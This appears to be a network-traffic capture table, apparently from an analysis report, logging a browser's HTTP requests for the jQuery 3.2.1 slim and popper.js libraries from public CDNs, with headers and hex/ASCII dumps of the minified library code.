stripped-down indexOf as it's faster than native// https://jsperf.com/thor-indexof-vs-for/5indexOf = fun

Timestamp	Bytes transferred	Direction	Data
2025-04-02 13:01:59 UTC	619	OUT	GET /jquery-3.2.1.slim.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive Origin: https://7b6fzcwcqmmd8xoz5.kaisargift.com:8443 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://7b6fzcwcqmmd8xoz5.kaisargift.com:8443/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-04-02 13:02:00 UTC	562	IN	HTTP/1.1 200 OK Connection: close Content-Length: 69597 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-10fdd" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Accept-Ranges: bytes Age: 1921245 Date: Wed, 02 Apr 2025 13:02:00 GMT Via: 1.1 varnish X-Served-By: cache-lga21938-LGA X-Cache: HIT X-Cache-Hits: 0 X-Timer: S1743598920.060273,VS0,VE1 Vary: Accept-Encoding
2025-04-02 13:02:00 UTC	1378	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 32 2e 31 20 2d 61 6a 61 78 2c 2d 61 6a 61 78 2f 6a 73 6f 6e 70 2c 2d 61 6a 61 78 2f 6c 6f 61 64 2c 2d 61 6a 61 78 2f 70 61 72 73 65 58 4d 4c 2c 2d 61 6a 61 78 2f 73 63 72 69 70 74 2c 2d 61 6a 61 78 2f 76 61 72 2f 6c 6f 63 61 74 69 6f 6e 2c 2d 61 6a 61 78 2f 76 61 72 2f 6e 6f 6e 63 65 2c 2d 61 6a 61 78 2f 76 61 72 2f 72 71 75 65 72 79 2c 2d 61 6a 61 78 2f 78 68 72 2c 2d 6d 61 6e 69 70 75 6c 61 74 69 6f 6e 2f 5f 65 76 61 6c 55 72 6c 2c 2d 65 76 65 6e 74 2f 61 6a 61 78 2c 2d 65 66 66 65 63 74 73 2c 2d 65 66 66 65 63 74 73 2f 54 77 65 65 6e 2c 2d 65 66 66 65 63 74 73 2f 61 6e 69 6d 61 74 65 64 53 65 6c 65 63 74 6f 72 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e Data Ascii: /*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector \| (c) JS Foundation and other con
2025-04-02 13:02:00 UTC	1378	IN	Data Raw: 5b 61 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 72 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 61 29 3b 72 65 74 75 72 6e 20 62 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 62 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 72 2e 65 61 63 68 28 74 68 69 73 2c 61 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 72 2e 6d 61 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 20 61 2e 63 61 6c 6c 28 62 2c 63 2c 62 29 7d 29 29 7d 2c 73 6c 69 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 Data Ascii: [a]},pushStack:function(a){var b=r.merge(this.constructor(),a);return b.prevObject=this,b},each:function(a){return r.each(this,a)},map:function(a){return this.pushStack(r.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushSta
2025-04-02 13:02:00 UTC	1378	IN	Data Raw: 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6b 2e 63 61 6c 6c 28 61 29 29 26 26 28 21 28 62 3d 65 28 61 29 29 7c 7c 28 63 3d 6c 2e 63 61 6c 6c 28 62 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 62 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 63 26 26 6d 2e 63 61 6c 6c 28 63 29 3d 3d 3d 6e 29 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3b 66 6f 72 28 62 20 69 6e 20 61 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 74 79 70 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 61 3f 61 2b 22 22 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 61 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 Data Ascii: ject Object]"!==k.call(a))&&(!(b=e(a))\|\|(c=l.call(b,"constructor")&&b.constructor,"function"==typeof c&&m.call(c)===n))},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a\|\|"function"==typ
2025-04-02 13:02:00 UTC	1378	IN	Data Raw: 6e 6f 77 2c 73 75 70 70 6f 72 74 3a 6f 7d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 28 72 2e 66 6e 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 63 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 29 2c 72 2e 65 61 63 68 28 22 42 6f 6f 6c 65 61 6e 20 4e 75 6d 62 65 72 20 53 74 72 69 6e 67 20 46 75 6e 63 74 69 6f 6e 20 41 72 72 61 79 20 44 61 74 65 20 52 65 67 45 78 70 20 4f 62 6a 65 63 74 20 45 72 72 6f 72 20 53 79 6d 62 6f 6c 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 6a 5b 22 5b 6f 62 6a 65 63 74 20 22 2b 62 2b 22 5d 22 5d 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 77 28 61 29 7b 76 61 72 20 62 3d 21 21 61 26 26 22 6c 65 Data Ascii: now,support:o}),"function"==typeof Symbol&&(r.fn[Symbol.iterator]=c[Symbol.iterator]),r.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(a,b){j["[object "+b+"]"]=b.toLowerCase()});function w(a){var b=!!a&&"le
2025-04-02 13:02:00 UTC	1378	IN	Data Raw: 22 29 22 29 2c 43 4c 41 53 53 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 5c 5c 2e 28 22 2b 4c 2b 22 29 22 29 2c 54 41 47 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 22 2b 4c 2b 22 7c 5b 2a 5d 29 22 29 2c 41 54 54 52 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 29 2c 50 53 45 55 44 4f 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4e 29 2c 43 48 49 4c 44 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 3a 28 6f 6e 6c 79 7c 66 69 72 73 74 7c 6c 61 73 74 7c 6e 74 68 7c 6e 74 68 2d 6c 61 73 74 29 2d 28 63 68 69 6c 64 7c 6f 66 2d 74 79 70 65 29 28 3f 3a 5c 5c 28 22 2b 4b 2b 22 2a 28 65 76 65 6e 7c 6f 64 64 7c 28 28 5b 2b 2d 5d 7c 29 28 5c 5c 64 2a 29 6e 7c 29 22 2b 4b 2b 22 2a 28 3f 3a 28 5b 2b 2d 5d 7c 29 22 2b 4b 2b 22 2a 28 5c 5c 64 2b 29 7c 29 29 22 2b 4b Data Ascii: ")"),CLASS:new RegExp("^\\.("+L+")"),TAG:new RegExp("^("+L+"\|[])"),ATTR:new RegExp("^"+M),PSEUDO:new RegExp("^"+N),CHILD:new RegExp("^:(only\|first\|last\|nth\|nth-last)-(child\|of-type)(?:\\("+K+"(even\|odd\|(([+-]\|)(\\d)n\|)"+K+"(?:([+-]\|)"+K+"*(\\d+)\|))"+K
2025-04-02 13:02:00 UTC	1378	IN	Data Raw: 3d 3d 77 26 26 31 31 21 3d 3d 77 29 72 65 74 75 72 6e 20 64 3b 69 66 28 21 65 26 26 28 28 62 3f 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 3a 76 29 21 3d 3d 6e 26 26 6d 28 62 29 2c 62 3d 62 7c 7c 6e 2c 70 29 29 7b 69 66 28 31 31 21 3d 3d 77 26 26 28 6c 3d 5a 2e 65 78 65 63 28 61 29 29 29 69 66 28 66 3d 6c 5b 31 5d 29 7b 69 66 28 39 3d 3d 3d 77 29 7b 69 66 28 21 28 6a 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 66 29 29 29 72 65 74 75 72 6e 20 64 3b 69 66 28 6a 2e 69 64 3d 3d 3d 66 29 72 65 74 75 72 6e 20 64 2e 70 75 73 68 28 6a 29 2c 64 7d 65 6c 73 65 20 69 66 28 73 26 26 28 6a 3d 73 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 66 29 29 26 26 74 28 62 2c 6a 29 26 26 6a 2e 69 64 3d 3d 3d 66 29 72 65 74 75 72 6e 20 64 2e 70 75 73 68 Data Ascii: ==w&&11!==w)return d;if(!e&&((b?b.ownerDocument\|\|b:v)!==n&&m(b),b=b\|\|n,p)){if(11!==w&&(l=Z.exec(a)))if(f=l[1]){if(9===w){if(!(j=b.getElementById(f)))return d;if(j.id===f)return d.push(j),d}else if(s&&(j=s.getElementById(f))&&t(b,j)&&j.id===f)return d.push
2025-04-02 13:02:00 UTC	1378	IN	Data Raw: 20 6d 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 22 69 6e 70 75 74 22 3d 3d 3d 63 26 26 62 2e 74 79 70 65 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6e 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 28 22 69 6e 70 75 74 22 3d 3d 3d 63 7c 7c 22 62 75 74 74 6f 6e 22 3d 3d 3d 63 29 26 26 62 2e 74 79 70 65 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 22 66 6f 72 6d 22 69 6e 20 62 3f 62 2e 70 61 Data Ascii: ma(a){return function(b){var c=b.nodeName.toLowerCase();return"input"===c&&b.type===a}}function na(a){return function(b){var c=b.nodeName.toLowerCase();return("input"===c\|\|"button"===c)&&b.type===a}}function oa(a){return function(b){return"form"in b?b.pa
2025-04-02 13:02:00 UTC	1378	IN	Data Raw: 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 7c 7c 21 6e 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 75 29 2e 6c 65 6e 67 74 68 7d 29 2c 63 2e 67 65 74 42 79 49 64 3f 28 64 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 72 65 70 6c 61 63 65 28 5f 2c 61 61 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 62 7d 7d 2c 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29 Data Ascii: getElementsByName\|\|!n.getElementsByName(u).length}),c.getById?(d.filter.ID=function(a){var b=a.replace(_,aa);return function(a){return a.getAttribute("id")===b}},d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c=b.getElementById(a)
2025-04-02 13:02:00 UTC	1378	IN	Data Raw: 2e 70 75 73 68 28 22 5b 2a 5e 24 5d 3d 22 2b 4b 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 73 65 6c 65 63 74 65 64 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 4b 2b 22 2a 28 3f 3a 76 61 6c 75 65 7c 22 2b 4a 2b 22 29 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 69 64 7e 3d 22 2b 75 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 7e 3d 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 75 2b 22 2b 2a 22 29 2e Data Ascii: .push("[^$]="+K+"(?:''\|\"\")"),a.querySelectorAll("[selected]").length\|\|q.push("\\["+K+"(?:value\|"+J+")"),a.querySelectorAll("[id~="+u+"-]").length\|\|q.push("~="),a.querySelectorAll(":checked").length\|\|q.push(":checked"),a.querySelectorAll("a#"+u+"+").
2025-04-02 13:02:00 UTC	1378	IN	Data Raw: 65 29 69 66 28 62 3d 3d 3d 61 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 42 3d 62 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 64 3d 21 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 64 3f 64 3a 28 64 3d 28 61 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 61 29 3d 3d 3d 28 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 29 3f 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 62 29 3a 31 2c 31 26 64 7c 7c 21 63 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75 Data Ascii: e)if(b===a)return!0;return!1},B=b?function(a,b){if(a===b)return l=!0,0;var d=!a.compareDocumentPosition-!b.compareDocumentPosition;return d?d:(d=(a.ownerDocument\|\|a)===(b.ownerDocument\|\|b)?a.compareDocumentPosition(b):1,1&d\|\|!c.sortDetached&&b.compareDocu

Timestamp	Bytes transferred	Direction	Data
2025-04-02 13:02:00 UTC	644	OUT	GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1 Host: cdnjs.cloudflare.com Connection: keep-alive Origin: https://7b6fzcwcqmmd8xoz5.kaisargift.com:8443 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://7b6fzcwcqmmd8xoz5.kaisargift.com:8443/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-04-02 13:02:00 UTC	961	IN	HTTP/1.1 200 OK Date: Wed, 02 Apr 2025 13:02:00 GMT Content-Type: application/javascript; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=30672000 ETag: W/"5eb03fa9-4af4" Last-Modified: Mon, 04 May 2020 16:15:37 GMT cf-cdnjs-via: cfworker/kv Cross-Origin-Resource-Policy: cross-origin Timing-Allow-Origin: * X-Content-Type-Options: nosniff CF-Cache-Status: HIT Age: 1005364 Expires: Mon, 23 Mar 2026 13:02:00 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eoPMFM95jd%2BmFmoI3%2FDU91%2B477ii2EhR5W1pa9YTo8G27Zojo81SdltccZf4FyzlEhJlxUbU4T5eE0C5sB4O2qBFmOCEWVqBPjN5nrOteaJTx9k8lLEUUJOdppyyPLTNj34E%2Fs9F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=15780000 Server: cloudflare CF-RAY: 92a084a68887adca-EWR alt-svc: h3=":443"; ma=86400
2025-04-02 13:02:00 UTC	408	IN	Data Raw: 34 61 66 34 0d 0a 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 37 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 Data Ascii: 4af4/* Copyright (C) Federico Zivolo 2017 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&
2025-04-02 13:02:00 UTC	1369	IN	Data Raw: 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 5b 5d 3b 76 61 72 20 6f 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 74 3f 6f 5b 74 5d 3a 6f 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 27 48 54 4d 4c 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3f 65 3a 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 65 2e 68 6f 73 74 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 73 77 69 74 63 68 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7b 63 61 73 65 27 48 54 4d 4c 27 3a 63 61 73 65 27 42 4f 44 59 27 3a 72 65 74 75 72 6e 20 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 63 61 73 65 27 23 64 6f 63 75 6d 65 6e Data Ascii: ==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode\|\|e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#documen
2025-04-02 13:02:00 UTC	1369	IN	Data Raw: 29 7b 76 61 72 20 6f 3d 32 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 2c 69 3d 61 28 74 2c 27 74 6f 70 27 29 2c 6e 3d 61 28 74 2c 27 6c 65 66 74 27 29 2c 72 3d 6f 3f 2d 31 3a 31 3b 72 65 74 75 72 6e 20 65 2e 74 6f 70 2b 3d 69 2a 72 2c 65 2e 62 6f 74 74 6f 6d 2b 3d 69 2a 72 2c 65 2e 6c 65 66 74 2b 3d 6e 2a 72 2c 65 2e 72 69 67 68 74 2b 3d 6e 2a 72 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 29 7b 76 61 72 20 6f 3d 27 78 27 3d 3d 3d 74 3f 27 4c 65 66 74 27 3a 27 54 6f 70 27 2c 69 3d 27 4c 65 66 74 27 3d 3d 6f 3f 27 52 69 67 68 74 27 3a 27 42 6f 74 74 6f 6d 27 3b 72 65 74 75 72 6e 20 70 61 72 73 65 46 6c 6f 61 74 28 65 5b 27 62 6f 72 Data Ascii: ){var o=2<arguments.length&&void 0!==arguments[2]&&arguments[2],i=a(t,'top'),n=a(t,'left'),r=o?-1:1;return e.top+=ir,e.bottom+=ir,e.left+=nr,e.right+=nr,e}function f(e,t){var o='x'===t?'Left':'Top',i='Left'==o?'Right':'Bottom';return parseFloat(e['bor
2025-04-02 13:02:00 UTC	1369	IN	Data Raw: 6f 70 3a 70 2e 74 6f 70 2d 73 2e 74 6f 70 2d 66 2c 6c 65 66 74 3a 70 2e 6c 65 66 74 2d 73 2e 6c 65 66 74 2d 6d 2c 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 29 3b 69 66 28 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 30 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 30 2c 21 69 26 26 72 29 7b 76 61 72 20 75 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 54 6f 70 2c 31 30 29 2c 62 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 4c 65 66 74 2c 31 30 29 3b 68 2e 74 6f 70 2d 3d 66 2d 75 2c 68 2e 62 6f 74 74 6f 6d 2d 3d 66 2d 75 2c 68 2e 6c 65 66 74 2d 3d 6d 2d 62 2c 68 2e 72 69 67 68 74 2d 3d 6d 2d 62 2c 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 75 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 62 7d 72 65 74 75 Data Ascii: op:p.top-s.top-f,left:p.left-s.left-m,width:p.width,height:p.height});if(h.marginTop=0,h.marginLeft=0,!i&&r){var u=parseFloat(a.marginTop,10),b=parseFloat(a.marginLeft,10);h.top-=f-u,h.bottom-=f-u,h.left-=m-b,h.right-=m-b,h.marginTop=u,h.marginLeft=b}retu
2025-04-02 13:02:00 UTC	1369	IN	Data Raw: 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 2c 62 6f 74 74 6f 6d 3a 7b 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 62 6f 74 74 6f 6d 2d 74 2e 62 6f 74 74 6f 6d 7d 2c 6c 65 66 74 3a 7b 77 69 64 74 68 3a 74 2e 6c 65 66 74 2d 70 2e 6c 65 66 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 7d 2c 64 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 73 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 73 65 28 7b 6b 65 79 3a 65 7d 2c 73 5b 65 5d 2c 7b 61 72 65 61 3a 45 28 73 5b 65 5d 29 7d 29 7d 29 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 61 72 65 61 2d 65 2e 61 72 65 61 7d 29 2c 61 3d 64 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 77 Data Ascii: ight:p.height},bottom:{width:p.width,height:p.bottom-t.bottom},left:{width:t.left-p.left,height:p.height}},d=Object.keys(s).map(function(e){return se({key:e},s[e],{area:E(s[e])})}).sort(function(e,t){return t.area-e.area}),a=d.filter(function(e){var t=e.w
2025-04-02 13:02:00 UTC	1369	IN	Data Raw: 6c 65 2e 77 61 72 6e 28 27 60 6d 6f 64 69 66 69 65 72 2e 66 75 6e 63 74 69 6f 6e 60 20 69 73 20 64 65 70 72 65 63 61 74 65 64 2c 20 75 73 65 20 60 6d 6f 64 69 66 69 65 72 2e 66 6e 60 21 27 29 3b 76 61 72 20 69 3d 74 5b 27 66 75 6e 63 74 69 6f 6e 27 5d 7c 7c 74 2e 66 6e 3b 74 2e 65 6e 61 62 6c 65 64 26 26 65 28 69 29 26 26 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 29 2c 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 29 2c 6f 3d 69 28 6f 2c 74 29 29 7d 29 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 29 7b 69 66 28 21 74 68 69 73 2e 73 74 61 74 65 2e 69 73 44 65 73 74 72 6f 79 65 64 29 7b 76 61 72 20 65 3d 7b 69 6e 73 74 Data Ascii: le.warn('`modifier.function` is deprecated, use `modifier.fn`!');var i=t['function']\|\|t.fn;t.enabled&&e(i)&&(o.offsets.popper=c(o.offsets.popper),o.offsets.reference=c(o.offsets.reference),o=i(o,t))}),o}function N(){if(!this.state.isDestroyed){var e={inst
2025-04-02 13:02:00 UTC	1369	IN	Data Raw: 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 6d 6f 76 65 4f 6e 44 65 73 74 72 6f 79 26 26 74 68 69 73 2e 70 6f 70 70 65 72 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 68 69 73 2e 70 6f 70 70 65 72 29 2c 74 68 69 73 7d 66 75 6e 63 74 69 6f 6e 20 42 28 65 29 7b 76 61 72 20 74 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3b 72 65 74 75 72 6e 20 74 3f 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 77 69 6e 64 6f 77 7d 66 75 6e 63 74 69 6f 6e 20 48 28 65 2c 74 2c 6f 2c 69 29 7b 76 61 72 20 72 3d 27 42 4f 44 59 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2c 70 3d 72 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 65 3b 70 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 6f 2c 7b 70 61 73 Data Ascii: his.options.removeOnDestroy&&this.popper.parentNode.removeChild(this.popper),this}function B(e){var t=e.ownerDocument;return t?t.defaultView:window}function H(e,t,o,i){var r='BODY'===e.nodeName,p=r?e.ownerDocument.defaultView:e;p.addEventListener(t,o,{pas
